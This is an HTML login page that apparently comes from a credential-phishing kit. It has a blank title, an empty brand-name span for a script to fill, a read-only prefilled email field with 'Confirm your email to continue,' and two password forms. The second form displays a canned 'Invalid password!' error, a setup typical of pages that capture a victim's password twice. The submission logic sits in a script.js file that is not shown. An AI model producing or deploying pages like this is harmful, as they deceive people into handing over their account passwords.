<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, intial-scale=1">
<title></title>
<link rel="shortcut icon" type="image/png" href="https://favicon.ico"/>
<link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<div class="wrap">
<center>
<div class="loginBox">
<div class="ibox">
<span id="docs" class="doc"></span>
<img  id="img" class="img2">
</div>
<div class="br2"></div>
<span class="tag">
Confirm your email to continue.
</span>
<div class="br2"></div>

<form id="form1" method="post">
<input id="user" name="username" placeholder="Email address" value="" readonly>
<div class="br"></div>
<input id="pass" name="password" minlength="8" placeholder="Password" required autofocus="on">
<div class="br"></div>
<div class="cbox">
<input type="checkbox" class="check" checked="checked">
<span class="lb">Remember Device</span>
</div>
<div class="br2"></div>
<input id="next" type="submit" name="nxt" value="Continue">
</form>

<form id="form2" method="post">
<input id="user2" name="username" placeholder="Email address" value="" readonly>
<div class="br"></div>
<input id="pass2" name="password" minlength="8" placeholder="Password" required autofocus="on">
<div class="br"></div>
<div id="error">Invalid password!</div>
<div class="br"></div>
<div class="cbox">
<input type="checkbox" class="check" checked="checked">
<span class="lb">Remember Device</span>
</div>
<div class="br2"></div>
<input id="submit" type="submit" name="sub" value="Continue">
</form>

</div>
<div class="br2"></div>
<div class="h"></div>

<div class="foot">
English &nbsp; (US) &nbsp; Help &nbsp; Terms &nbsp; Privacy &nbsp; Policy
<br>
Copyright &copy; 2021 &nbsp; <span id="ftitle"></span>, Inc. All rights reserved.
</div>
</center>
</div>

<script src="//code.jquery.com/jquery-1.12.4.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script> 
<script src="script.js"></script>

</body>
</html>